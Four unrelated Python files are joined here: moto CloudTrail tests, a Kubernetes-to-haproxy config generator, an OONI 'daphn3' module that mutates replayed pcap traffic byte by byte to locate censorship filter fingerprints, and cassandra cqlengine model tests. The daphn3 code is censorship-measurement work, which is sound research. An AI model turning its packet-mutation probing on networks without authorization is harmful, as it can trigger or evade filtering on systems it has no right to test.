@mock_s3
def test_get_trail_status_after_starting():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, _, trail_name = create_trail_simple(region_name="eu-west-3")
client.start_logging(Name=trail_name)
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(True)
status.should.have.key("LatestDeliveryTime").be.a(datetime)
status.should.have.key("StartLoggingTime").be.a(datetime)
status.should.have.key(
"LatestDeliveryAttemptTime"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key(
"LatestDeliveryAttemptSucceeded"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("TimeLoggingStarted") # .equal("2021-10-13T15:02:21Z")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StopLoggingTime")
@mock_cloudtrail
@mock_s3
def test_get_trail_status_after_starting_and_stopping():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, _, trail_name = create_trail_simple(region_name="eu-west-3")
client.start_logging(Name=trail_name)
client.stop_logging(Name=trail_name)
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryTime").be.a(datetime)
status.should.have.key("StartLoggingTime").be.a(datetime)
status.should.have.key("StopLoggingTime").be.a(datetime)
status.should.have.key(
"LatestDeliveryAttemptTime"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key(
"LatestDeliveryAttemptSucceeded"
) # .equal("2021-10-13T15:36:53Z")
status.should.have.key("TimeLoggingStarted") # .equal("2021-10-13T15:02:21Z")
status.should.have.key("TimeLoggingStopped") # .equal("2021-10-13T15:03:21Z")
@mock_cloudtrail
@mock_s3
@mock_sns
def test_list_trails():
client = boto3.client("cloudtrail", region_name="eu-west-3")
_, trail1, _ = create_trail_simple()
_, trail2, _, _ = create_trail_advanced(region_name="ap-southeast-2")
_, trail3, _ = create_trail_simple(region_name="eu-west-1")
all_trails = client.list_trails()["Trails"]
all_trails.should.have.length_of(3)
all_trails.should.contain(
{
"TrailARN": trail1["TrailARN"],
"Name": trail1["Name"],
"HomeRegion": "us-east-1",
}
)
all_trails.should.contain(
{
"TrailARN": trail2["TrailARN"],
"Name": trail2["Name"],
"HomeRegion": "ap-southeast-2",
}
)
all_trails.should.contain(
{
"TrailARN": trail3["TrailARN"],
"Name": trail3["Name"],
"HomeRegion": "eu-west-1",
}
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_without_shadowtrails():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, trail1, _ = create_trail_simple()
_, trail2, _, _ = create_trail_advanced()
_, trail3, _ = create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(3)
first_trail = [t for t in trails if t["Name"] == trail1["Name"]][0]
first_trail.should.have.key("Name").equal(trail1["Name"])
first_trail.should.have.key("S3BucketName").equal(trail1["S3BucketName"])
first_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
first_trail.should.have.key("IsMultiRegionTrail").equal(False)
first_trail.should.have.key("HomeRegion").equal("us-east-1")
first_trail.should.have.key("LogFileValidationEnabled").equal(False)
first_trail.should.have.key("HasCustomEventSelectors").equal(False)
first_trail.should.have.key("HasInsightSelectors").equal(False)
first_trail.should.have.key("IsOrganizationTrail").equal(False)
first_trail.shouldnt.have.key("S3KeyPrefix")
first_trail.shouldnt.have.key("SnsTopicName")
first_trail.shouldnt.have.key("SnsTopicARN")
second_trail = [t for t in trails if t["Name"] == trail2["Name"]][0]
second_trail.should.have.key("Name").equal(trail2["Name"])
second_trail.should.have.key("S3BucketName").equal(trail2["S3BucketName"])
second_trail.should.have.key("S3KeyPrefix").equal(trail2["S3KeyPrefix"])
second_trail.should.have.key("SnsTopicName").equal(trail2["SnsTopicName"])
second_trail.should.have.key("SnsTopicARN").equal(trail2["SnsTopicARN"])
second_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
second_trail.should.have.key("IsMultiRegionTrail").equal(True)
second_trail.should.have.key("HomeRegion").equal("us-east-1")
second_trail.should.have.key("LogFileValidationEnabled").equal(True)
second_trail.should.have.key("HasCustomEventSelectors").equal(False)
second_trail.should.have.key("HasInsightSelectors").equal(False)
second_trail.should.have.key("IsOrganizationTrail").equal(True)
third_trail = [t for t in trails if t["Name"] == trail3["Name"]][0]
third_trail.should.have.key("Name").equal(trail3["Name"])
third_trail.should.have.key("S3BucketName").equal(trail3["S3BucketName"])
third_trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
third_trail.should.have.key("IsMultiRegionTrail").equal(False)
third_trail.should.have.key("HomeRegion").equal("eu-west-1")
third_trail.should.have.key("LogFileValidationEnabled").equal(False)
third_trail.should.have.key("HasCustomEventSelectors").equal(False)
third_trail.should.have.key("HasInsightSelectors").equal(False)
third_trail.should.have.key("IsOrganizationTrail").equal(False)
third_trail.shouldnt.have.key("S3KeyPrefix")
third_trail.shouldnt.have.key("SnsTopicName")
third_trail.shouldnt.have.key("SnsTopicARN")
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_with_shadowtrails_true():
# Same behaviour as if shadowtrails-parameter was not supplied
client = boto3.client("cloudtrail", region_name="us-east-1")
create_trail_simple()
create_trail_advanced()
create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails(includeShadowTrails=True)["trailList"]
trails.should.have.length_of(3)
eu_client = boto3.client("cloudtrail", region_name="eu-west-1")
trails = eu_client.describe_trails(includeShadowTrails=True)["trailList"]
trails.should.have.length_of(3)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_describe_trails_with_shadowtrails_false():
# Only trails for the current region should now be returned
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name1 = create_trail_simple()
_, _, _, name2 = create_trail_advanced()
_, _, name3 = create_trail_simple(region_name="eu-west-1")
trails = client.describe_trails(includeShadowTrails=False)["trailList"]
trails.should.have.length_of(2)
[t["Name"] for t in trails].should.equal([name1, name2])
eu_client = boto3.client("cloudtrail", region_name="eu-west-1")
trails = eu_client.describe_trails(includeShadowTrails=False)["trailList"]
trails.should.have.length_of(1)
[t["Name"] for t in trails].should.equal([name3])
@mock_cloudtrail
@mock_s3
def test_delete_trail():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name = create_trail_simple()
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(1)
client.delete_trail(Name=name)
trails = client.describe_trails()["trailList"]
trails.should.have.length_of(0)
@mock_cloudtrail
@mock_s3
def test_update_trail_simple():
client = boto3.client("cloudtrail", region_name="ap-southeast-2")
bucket_name, trail, name = create_trail_simple(region_name="ap-southeast-2")
resp = client.update_trail(Name=name)
resp.should.have.key("Name").equal(name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(False)
resp.should.have.key("LogFileValidationEnabled").equal(False)
resp.should.have.key("IsOrganizationTrail").equal(False)
resp.shouldnt.have.key("S3KeyPrefix")
resp.shouldnt.have.key("SnsTopicName")
resp.shouldnt.have.key("SnsTopicARN")
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("S3BucketName").equal(bucket_name)
trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
trail.should.have.key("IsMultiRegionTrail").equal(False)
trail.should.have.key("LogFileValidationEnabled").equal(False)
trail.should.have.key("IsOrganizationTrail").equal(False)
trail.shouldnt.have.key("S3KeyPrefix")
trail.shouldnt.have.key("SnsTopicName")
trail.shouldnt.have.key("SnsTopicARN")
@mock_cloudtrail
@mock_s3
def test_update_trail_full():
client = boto3.client("cloudtrail", region_name="ap-southeast-1")
_, trail, name = create_trail_simple(region_name="ap-southeast-1")
resp = client.update_trail(
Name=name,
S3BucketName="updated_bucket",
S3KeyPrefix="s3kp",
SnsTopicName="stn",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=True,
EnableLogFileValidation=True,
CloudWatchLogsLogGroupArn="cwllga",
CloudWatchLogsRoleArn="cwlra",
KmsKeyId="kki",
IsOrganizationTrail=True,
)
resp.should.have.key("Name").equal(name)
resp.should.have.key("S3BucketName").equal("updated_bucket")
resp.should.have.key("S3KeyPrefix").equals("s3kp")
resp.should.have.key("SnsTopicName").equals("stn")
resp.should.have.key("IncludeGlobalServiceEvents").equal(False)
resp.should.have.key("IsMultiRegionTrail").equal(True)
resp.should.have.key("LogFileValidationEnabled").equal(True)
resp.should.have.key("IsOrganizationTrail").equal(True)
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("S3BucketName").equal("updated_bucket")
trail.should.have.key("S3KeyPrefix").equals("s3kp")
trail.should.have.key("SnsTopicName").equals("stn")
trail.should.have.key("IncludeGlobalServiceEvents").equal(False)
trail.should.have.key("IsMultiRegionTrail").equal(True)
trail.should.have.key("LogFileValidationEnabled").equal(True)
trail.should.have.key("IsOrganizationTrail").equal(True)
trail.should.have.key("CloudWatchLogsLogGroupArn").equals("cwllga")
trail.should.have.key("CloudWatchLogsRoleArn").equals("cwlra")
trail.should.have.key("KmsKeyId").equals("kki")
|
|
#!/usr/bin/python3
'''
Gathers endpoints for services from kubernetes-api and generates a haproxy.cfg from it.
Since not all endpoints should always be exposed, the endpoints have to be annotated to
be considered for haproxy-config generation. The required keywords are
domain - The domain-name under which the service is made available. Can be any string you desire.
proto - The protocol to expose the service with. All endpoints with proto=http go in the same
haproxy-frontend which forwards requests by HTTP-HOST-Header information to the corresponding
haproxy-http-backend.
The same applies to proto=https, except that requests are forwarded by SSL-SNI-Header
to the respective https-haproxy-backend.
If proto is set to anything else, for example 'redis', the template needs to extract that
endpoint's info manually. See Readme.md for a more detailed explanation.
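
For example (illustrative only), an Endpoints object qualifies once its
metadata carries both annotations:

    metadata:
      annotations:
        domain: www.example.com
        proto: http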
'''
# We are fine with lower case constants
# pylint: disable=invalid-name
# pylint: disable=missing-docstring
import os
import sys
import logging
import datetime
import argparse
import random
import string
import subprocess
import shutil
import time
from hashlib import md5 as hashmd5
from jinja2 import Environment
from jinja2 import FileSystemLoader
import simplejson
import requests
log = None
class ParseCAAction(argparse.Action):
'''
Helper class to support ssl-ca=<string> and --ssl-ca=False
    simultaneously.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values == 'False':
setattr(namespace, self.dest, False)
else:
setattr(namespace, self.dest, values)
class ArgParser(object):
'''
Parse commandline arguments.
'''
def __init__(self):
self.main_parser = argparse.ArgumentParser()
self.add_args()
def add_args(self):
'''
Add options to argparse instance
'''
self.main_parser.add_argument(
'--log-level',
type=str,
default='INFO',
dest='loglevel',
nargs='?',
required=False,
help='The loglevel of the logger'
)
self.main_parser.add_argument(
'--ignore-proxy-env',
type=bool,
default=True,
const=True,
dest='ignore_proxy_env',
nargs='?',
required=False,
help=(
'Whether to ignore http_proxy / https_proxy settings '
                'from environment (default: True)'
)
)
self.main_parser.add_argument(
'--ssl-key',
type=str,
default=None,
dest='ssl_key_file',
nargs='?',
required=False,
help='The SSL-client-key-file to use (default: None)'
)
self.main_parser.add_argument(
'--ssl-cert',
type=str,
default=None,
dest='ssl_cert_file',
nargs='?',
required=False,
help='The SSL-client-cert-file to use (default: None)'
)
self.main_parser.add_argument(
'--interval',
type=int,
default=30,
dest='refresh_interval',
nargs='?',
required=False,
help=(
'The interval at which to check changes in '
'the endpoints (default: 30)'
)
)
self.main_parser.add_argument(
'--ssl-ca',
type=str,
default='/etc/pyconfd/ca.pem',
dest='ssl_ca_file',
nargs='?',
required=False,
action=ParseCAAction,
help=(
'The SSL-ca-file to check the api-servers '
'certificate (default: /etc/pyconfd/ca.pem)'
)
)
self.main_parser.add_argument(
'--template-dir',
type=str,
default='/etc/pyconfd/',
dest='template_dir',
nargs='?',
required=False,
help='Where to find the template files (default: /etc/pyconfd)'
)
self.main_parser.add_argument(
'--haproxy-conf',
type=str,
default='/etc/haproxy/haproxy.cfg',
dest='haproxy_conf',
nargs='?',
required=False,
help=(
'The full path where to put the generated haproxy '
'config (default: /etc/haproxy/haproxy.cfg)'
)
)
self.main_parser.add_argument(
'--api-servers',
type=str,
default='',
dest='apiservers',
nargs='?',
required=True,
help=(
'List of api-server urls like https://<ip>:<port>, '
'they are tried in order (default: [])'
)
)
self.main_parser.add_argument(
'--haproxy-chk-cmd',
type=str,
default='/usr/sbin/haproxy -c -q -f',
dest='haproxy_check_cmd',
nargs='?',
required=False,
help=(
'The command to check the syntax of a haproxy '
'config (default: /usr/sbin/haproxy -c -q -f)'
)
)
self.main_parser.add_argument(
'--haproxy-reload-cmd',
type=str,
default='/etc/init.d/haproxy reload',
dest='haproxy_reload_cmd',
nargs='?',
required=False,
help=(
'The command to reload/restart haproxy '
                '(default: /etc/init.d/haproxy reload)'
)
)
def parse_args(self):
return self.main_parser.parse_args()
class MyLogger(object):
'''
Basic logging class for easy logging to the console
'''
def __init__(self, level=logging.INFO):
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.getLevelName(level.upper()))
ch_format = logging.Formatter('%(levelname)s - %(message)s')
conh = logging.StreamHandler()
conh.setFormatter(ch_format)
conh.setLevel(logging.getLevelName(level.upper()))
self.logger.addHandler(conh)
def info(self, msg):
self.logger.info(msg)
def error(self, msg):
self.logger.error(msg)
def debug(self, msg):
self.logger.debug(msg)
def load_tmpls(conf):
'''
Load all templates (files named *.tmpl) from configured
template dir and return jinja-environment
'''
log.info('Loading templates *.tmpl from {0}'.format(conf['template_dir']))
j2tmpls = Environment(
loader=FileSystemLoader(conf['template_dir']),
trim_blocks=True)
return j2tmpls
def md5(fname):
hash_md5 = hashmd5()
with open(fname, "rb") as md5f:
for chunk in iter(lambda: md5f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def writeconf(conf, data):
'''
Write the generated data to a temporary file and run syntax checks
on it. If successful, the temporary file is moved to its destination
    and the haproxy service is reloaded via the configured reload command.
'''
# Generate a random string for temporary config
tmp_name = '/tmp/haproxy.cfg.' + ''.join(
random.choice(string.ascii_uppercase) for _ in range(5))
try:
with open(tmp_name, 'w') as tmp_f:
tmp_f.write(''.join(data))
log.debug('Wrote temporary config to {0}'.format(tmp_name))
except (IOError, OSError) as w_err:
log.error('Failed to write generated config: {0}'.format(str(w_err)))
cmd = conf['haproxy_check_cmd'] + ' ' + tmp_name
log.debug('Executing syntax check: {0}'.format(cmd))
if subprocess.call(cmd.split()) == 0:
log.info('Syntax-check of temporary config at {0} successful'.format(tmp_name))
md5_inst_conf = md5(conf['haproxy_conf'])
md5_tmp_name = md5(tmp_name)
log.debug(
'md5sums {0}: {1}, {2}: {3}'.format(
conf['haproxy_conf'],
md5_inst_conf,
tmp_name,
md5_tmp_name
)
)
if md5_inst_conf == md5_tmp_name:
log.info('No changes in endpoints found, skipping installation of {0}'.format(tmp_name))
os.remove(tmp_name)
else:
log.info('Installing {0} config to {1}'.format(tmp_name, conf['haproxy_conf']))
shutil.move(tmp_name, conf['haproxy_conf'])
log.debug('Executing haproxy reload: {0}'.format(conf['haproxy_reload_cmd']))
if subprocess.call(conf['haproxy_reload_cmd'].split()) == 0:
log.info('Successfully reloaded haproxy!')
else:
                log.error('Failed to reload haproxy!')
else:
msg = 'Syntax-check of temporary config at {0} failed, aborting...'
raise SyntaxError(msg.format(tmp_name))
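# Illustrative sketch (an assumption, not part of the original tool): the
# configuration keys writeconf() reads, shown with the documented defaults.
# Nothing is executed here; it only documents the expected shape of conf.
def _example_writeconf_conf():
    return {
        'haproxy_check_cmd': '/usr/sbin/haproxy -c -q -f',
        'haproxy_reload_cmd': '/etc/init.d/haproxy reload',
        'haproxy_conf': '/etc/haproxy/haproxy.cfg',
    }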
def gen(svc_map=None, conf=None, extra=None, j2_map=None):
'''
Run through all files in template_dir and either add their contents (*.conf-files)
    or generate them as templates (*.tmpl-files) before adding the result. It's good
    practice to prefix the files with digits like 00, 01, 02, etc. to get ordered results.
'''
conf_files = sorted(os.listdir(conf['template_dir']))
gen_data = []
    # honour a caller-supplied extra mapping; default to the generation date
    if extra is None:
        extra = {
            'curdate': str(datetime.datetime.now())
        }
# Run through all the configs and templates and either add
# them to the config to generate (*.conf files) or render
# them (*.tmpl files).
for hafile in conf_files:
if hafile.endswith('.conf'):
log.debug('Adding plain config {0}'.format(hafile))
with open(os.path.join(conf['template_dir'], hafile), 'r') as cfile:
gen_data += cfile.readlines()
gen_data += '\n'
# if we got a template, pass the data to it and render
elif hafile.endswith('.tmpl'):
log.debug('Adding/Generating template {0}'.format(hafile))
tmpl = j2_map.get_template(hafile)
            gen_data.append(tmpl.render(domains=svc_map, extra=extra))
writeconf(conf, gen_data)
def parse_endpoints(data):
'''
Parse the endpoints and look for services annotated
with our keywords domain and proto. Ignore the others.
'''
svc_retr = {}
log.info('Checking annotations of retrieved endpoints...')
for endp in data['items']:
try:
domain = endp['metadata']['annotations']['domain']
proto = endp['metadata']['annotations']['proto']
ports = endp['subsets'][0]['ports'][0]['port']
svc_retr[domain] = {}
svc_retr[domain]['proto'] = proto
svc_retr[domain]['port'] = ports
for ips in endp['subsets'][0]['addresses']:
if 'ips' in svc_retr[domain]:
svc_retr[domain]['ips'].append(ips['ip'])
else:
svc_retr[domain]['ips'] = []
svc_retr[domain]['ips'].append(ips['ip'])
log.info('Found service {0}'.format(domain))
log.info(
'Endpoints: {0}'.format(
[''.join([x, ':', str(ports)]) for x in svc_retr[domain]['ips']]
)
)
except KeyError:
log.debug(
'Skipping endpoint {0}, no/not matching annotations'.format(
endp['metadata']['name']
)
)
except Exception as perr:
            raise SyntaxError('Failed to parse annotations: {0}'.format(perr))
return svc_retr
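# Hypothetical, minimal example of the endpoint document parse_endpoints()
# expects (field names follow the /api/v1/endpoints response used above).
# It assumes the module-level `log` has been set up as under __main__.
def _example_parse_endpoints():
    sample = {
        'items': [{
            'metadata': {
                'name': 'web',
                'annotations': {'domain': 'example.org', 'proto': 'http'},
            },
            'subsets': [{
                'ports': [{'port': 8080}],
                'addresses': [{'ip': '10.0.0.1'}, {'ip': '10.0.0.2'}],
            }],
        }]
    }
    # Expected result:
    # {'example.org': {'proto': 'http', 'port': 8080,
    #                  'ips': ['10.0.0.1', '10.0.0.2']}}
    return parse_endpoints(sample)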
def get_endpoints(conf):
'''
Gather endpoints from kubernetes api. If more than one api-server is supplied,
they are tried in order of appearance on the commandline.
'''
if conf['ignore_proxy_env']:
for k in list(os.environ.keys()):
if k.lower().endswith('_proxy'):
del os.environ[k]
for apisrv in conf['apiservers'].split(','):
try:
# switch definition of verify depending on passed
# or missing client certs and verify parameters
if isinstance(conf['ssl_ca_file'], str):
if os.path.isfile(conf['ssl_ca_file']):
verify = conf['ssl_ca_file']
else:
msg = 'Specified ca file {0} does not exist'
raise IOError(msg.format(conf['ssl_ca_file']))
elif isinstance(conf['ssl_ca_file'], bool):
verify = conf['ssl_ca_file']
else:
verify = True
# make the request either with client certs or without
# and server-cert verification or insecure ssl
if conf['ssl_cert_file'] and conf['ssl_key_file']:
if not os.path.isfile(conf['ssl_cert_file']):
msg = 'Specified cert file {0} does not exist'
raise IOError(msg.format(conf['ssl_cert_file']))
if not os.path.isfile(conf['ssl_key_file']):
msg = 'Specified key file {0} does not exist'
raise IOError(msg.format(conf['ssl_key_file']))
msg = 'Getting endpoints from API {0} with SSL-client-certs'
log.info(msg.format(apisrv))
data = requests.get(
apisrv + '/api/v1/endpoints',
cert=(conf['ssl_cert_file'], conf['ssl_key_file']),
verify=verify
)
else:
                msg = 'Getting endpoints from API {0} without SSL-client-certs'
log.info(msg.format(apisrv))
data = requests.get(
apisrv + '/api/v1/endpoints',
verify=verify
)
if data.status_code != 200:
                msg = 'Failed to load endpoints, API returned code {0}: {1}!'
raise ValueError(
msg.format(
data.status_code,
data.text
)
)
else:
msg = 'Successfully received endpoints from api: {0}'
log.info(msg.format(data.status_code))
except Exception as apierr:
msg = 'Failed to load endpoints from API: {0}!'
raise SyntaxError(msg.format(apierr))
try:
k8seps = simplejson.loads(data.text)
return parse_endpoints(k8seps)
except simplejson.scanner.JSONDecodeError as json_err:
msg = 'Failed to parse JSON-response from API: {0}'
        # JSONDecodeError cannot be re-raised from a plain message string,
        # so surface the parse failure as a ValueError instead
        raise ValueError(msg.format(json_err))
def conf_from_env():
env_vars = {
'APISERVERS': '',
'LOGLEVEL': 'INFO',
'SSL_KEY_FILE': '',
'SSL_CERT_FILE': '',
'SSL_CA_FILE': '',
'REFRESH_INTERVAL': 30,
'TEMPLATE_DIR': '/etc/pyconfd',
'HAPROXY_CONF': '/etc/haproxy/haproxy.cfg',
'HAPROXY_CHECK_CMD': '/usr/sbin/haproxy -c -q -f',
'HAPROXY_RELOAD_CMD': '/etc/init.d/haproxy reload',
'IGNORE_PROXY_ENV': True
}
found_vars = {}
for envvar, default in env_vars.items():
found_vars[envvar.lower()] = os.getenv(envvar, default)
return found_vars
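# Illustrative example (assumes TEMPLATE_DIR is not set in the environment):
# environment variables map to lower-cased config keys, and unset variables
# fall back to the defaults above.
def _example_conf_from_env():
    os.environ['APISERVERS'] = 'https://10.0.0.1:6443'
    conf = conf_from_env()
    assert conf['apiservers'] == 'https://10.0.0.1:6443'
    assert conf['template_dir'] == '/etc/pyconfd'
    return conf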
if __name__ == '__main__':
if len(sys.argv) <= 1:
args = conf_from_env()
else:
args = vars(ArgParser().parse_args())
log = MyLogger(level=args['loglevel'])
log.debug('Invoked with: {0}'.format(args))
while True:
try:
log.info('#########################################')
log.info('Run started at {0}'.format(str(datetime.datetime.now())))
log.info('#########################################')
j2_env = load_tmpls(args)
svcs = get_endpoints(args)
gen(svc_map=svcs, conf=args, j2_map=j2_env)
log.info('#########################################')
log.info('Run finished at {0}'.format(str(datetime.datetime.now())))
log.info('#########################################')
time.sleep(args['refresh_interval'])
except Exception as run_exc:
log.error('Execution failed: {0}'.format(run_exc))
time.sleep(args['refresh_interval'])
|
|
import sys
import yaml
from twisted.internet import protocol, defer
from twisted.internet.error import ConnectionDone
from oonib import log
def read_pcap(filename):
"""
@param filename: Filesystem path to the pcap.
Returns:
[{"client": "\x17\x52\x15"}, {"server": "\x17\x15\x13"}]
"""
from scapy.all import IP, Raw, rdpcap
packets = rdpcap(filename)
checking_first_packet = True
client_ip_addr = None
server_ip_addr = None
ssl_packets = []
messages = []
"""
pcap assumptions:
pcap only contains packets exchanged between a Tor client and a Tor
server. (This assumption makes sure that there are only two IP addresses
in the pcap file)
The first packet of the pcap is sent from the client to the server. (This
assumption is used to get the IP address of the client.)
All captured packets are TLS packets: that is TCP session
establishment/teardown packets should be filtered out (no SYN/SYN+ACK)
"""
"""
Minimally validate the pcap and also find out what's the client
and server IP addresses.
"""
for packet in packets:
if checking_first_packet:
client_ip_addr = packet[IP].src
checking_first_packet = False
else:
if packet[IP].src != client_ip_addr:
server_ip_addr = packet[IP].src
try:
if (packet[Raw]):
ssl_packets.append(packet)
except IndexError:
pass
"""Form our list."""
for packet in ssl_packets:
if packet[IP].src == client_ip_addr:
messages.append({"client": str(packet[Raw])})
elif packet[IP].src == server_ip_addr:
messages.append({"server": str(packet[Raw])})
else:
raise("Detected third IP address! pcap is corrupted.")
return messages
def read_yaml(filename):
f = open(filename)
obj = yaml.safe_load(f)
f.close()
return obj
class NoInputSpecified(Exception):
pass
class StepError(Exception):
pass
def daphn3MutateString(string, i):
"""
    Takes a string and mutates the i-th byte of it.
"""
mutated = ""
for y in range(len(string)):
if y == i:
mutated += chr(ord(string[i]) + 1)
else:
mutated += string[y]
return mutated
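# Worked example (illustrative): mutating index 1 of "abc" bumps the byte
# 'b' (0x62) by one to 'c' (0x63), giving "acc".
def _example_daphn3MutateString():
    assert daphn3MutateString("abc", 1) == "acc"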
def daphn3Mutate(steps, step_idx, mutation_idx):
"""
Take a set of steps and a step index and mutates the step of that
index at the mutation_idx'th byte.
"""
mutated_steps = []
for idx, step in enumerate(steps):
if idx == step_idx:
step_string = step.values()[0]
step_key = step.keys()[0]
mutated_string = daphn3MutateString(step_string,
mutation_idx)
mutated_steps.append({step_key: mutated_string})
else:
mutated_steps.append(step)
return mutated_steps
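# Worked example (illustrative; Python 2 single-key dicts, like the rest of
# this module): only the step selected by step_idx is mutated, at byte
# mutation_idx, while the other steps pass through untouched.
def _example_daphn3Mutate():
    steps = [{"client": "abc"}, {"server": "xyz"}]
    assert daphn3Mutate(steps, 1, 0) == [{"client": "abc"}, {"server": "yyz"}]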
class Daphn3Protocol(protocol.Protocol):
steps = None
role = "client"
report = None
# We use this index to keep track of where we are in the state machine
current_step = 0
current_data_received = 0
# We use this to keep track of the mutated steps
mutated_steps = None
d = defer.Deferred()
def _current_step_role(self):
return self.steps[self.current_step].keys()[0]
def _current_step_data(self):
step_idx, mutation_idx = self.factory.mutation
log.debug("Mutating %s %s" % (step_idx, mutation_idx))
mutated_step = daphn3Mutate(self.steps,
step_idx, mutation_idx)
log.debug("Mutated packet into %s" % mutated_step)
return mutated_step[self.current_step].values()[0]
def sendPayload(self):
self.debug("Sending payload")
current_step_role = self._current_step_role()
current_step_data = self._current_step_data()
if current_step_role == self.role:
print "In a state to do shit %s" % current_step_data
self.transport.write(current_step_data)
self.nextStep()
else:
print "Not in a state to do anything"
def connectionMade(self):
print "Got connection"
def debug(self, msg):
log.debug("Current step %s" % self.current_step)
log.debug("Current data received %s" % self.current_data_received)
log.debug("Current role %s" % self.role)
log.debug("Current steps %s" % self.steps)
log.debug("Current step data %s" % self._current_step_data())
def nextStep(self):
"""
XXX this method is overwritten individually by client and server transport.
There is probably a smarter way to do this and refactor the common
code into one place, but for the moment like this is good.
"""
pass
def dataReceived(self, data):
current_step_role = self.steps[self.current_step].keys()[0]
log.debug("Current step role %s" % current_step_role)
if current_step_role == self.role:
log.debug("Got a state error!")
raise StepError("I should not have gotten data, while I did, \
perhaps there is something wrong with the state machine?")
self.current_data_received += len(data)
expected_data_in_this_state = len(self.steps[self.current_step].values()[0])
log.debug("Current data received %s" % self.current_data_received)
if self.current_data_received >= expected_data_in_this_state:
self.nextStep()
def nextMutation(self):
log.debug("Moving onto next mutation")
# [step_idx, mutation_idx]
c_step_idx, c_mutation_idx = self.factory.mutation
log.debug("[%s]: c_step_idx: %s | c_mutation_idx: %s" % (self.role,
c_step_idx, c_mutation_idx))
if c_step_idx >= (len(self.steps) - 1):
log.err("No censorship fingerprint bisected.")
log.err("Givinig up.")
self.transport.loseConnection()
return
# This means we have mutated all bytes in the step
# we should proceed to mutating the next step.
log.debug("steps: %s | %s" % (self.steps, self.steps[c_step_idx]))
if c_mutation_idx >= (len(self.steps[c_step_idx].values()[0]) - 1):
log.debug("Finished mutating step")
# increase step
self.factory.mutation[0] += 1
# reset mutation idx
self.factory.mutation[1] = 0
else:
log.debug("Mutating next byte in step")
# increase mutation index
self.factory.mutation[1] += 1
def connectionLost(self, reason):
self.debug("--- Lost the connection ---")
self.nextMutation()
|
|
# Copyright 2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from uuid import uuid4
import random
from datetime import date
from operator import itemgetter
from cassandra.cqlengine import CQLEngineException
from tests.integration.cqlengine.base import BaseCassEngTestCase
from cassandra.cqlengine.management import sync_table
from cassandra.cqlengine.management import drop_table
from cassandra.cqlengine.models import Model
from cassandra.cqlengine import columns
class TestModel(Model):
id = columns.UUID(primary_key=True, default=lambda: uuid4())
count = columns.Integer()
text = columns.Text(required=False)
a_bool = columns.Boolean(default=False)
class TestModelIO(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestModelIO, cls).setUpClass()
sync_table(TestModel)
@classmethod
def tearDownClass(cls):
super(TestModelIO, cls).tearDownClass()
drop_table(TestModel)
def test_model_save_and_load(self):
"""
Tests that models can be saved and retrieved
"""
tm = TestModel.create(count=8, text='123456789')
self.assertIsInstance(tm, TestModel)
tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsInstance(tm2, TestModel)
for cname in tm._columns.keys():
self.assertEqual(getattr(tm, cname), getattr(tm2, cname))
def test_model_read_as_dict(self):
"""
Tests that columns of an instance can be read as a dict.
"""
tm = TestModel.create(count=8, text='123456789', a_bool=True)
column_dict = {
'id': tm.id,
'count': tm.count,
'text': tm.text,
'a_bool': tm.a_bool,
}
self.assertEqual(sorted(tm.keys()), sorted(column_dict.keys()))
self.assertItemsEqual(tm.values(), column_dict.values())
self.assertEqual(
sorted(tm.items(), key=itemgetter(0)),
sorted(column_dict.items(), key=itemgetter(0)))
self.assertEqual(len(tm), len(column_dict))
for column_id in column_dict.keys():
self.assertEqual(tm[column_id], column_dict[column_id])
tm['count'] = 6
self.assertEqual(tm.count, 6)
def test_model_updating_works_properly(self):
"""
Tests that subsequent saves after initial model creation work
"""
tm = TestModel.objects.create(count=8, text='123456789')
tm.count = 100
tm.a_bool = True
tm.save()
tm2 = TestModel.objects(id=tm.pk).first()
self.assertEqual(tm.count, tm2.count)
self.assertEqual(tm.a_bool, tm2.a_bool)
def test_model_deleting_works_properly(self):
"""
Tests that an instance's delete method deletes the instance
"""
tm = TestModel.create(count=8, text='123456789')
tm.delete()
tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsNone(tm2)
def test_column_deleting_works_properly(self):
"""
"""
tm = TestModel.create(count=8, text='123456789')
tm.text = None
tm.save()
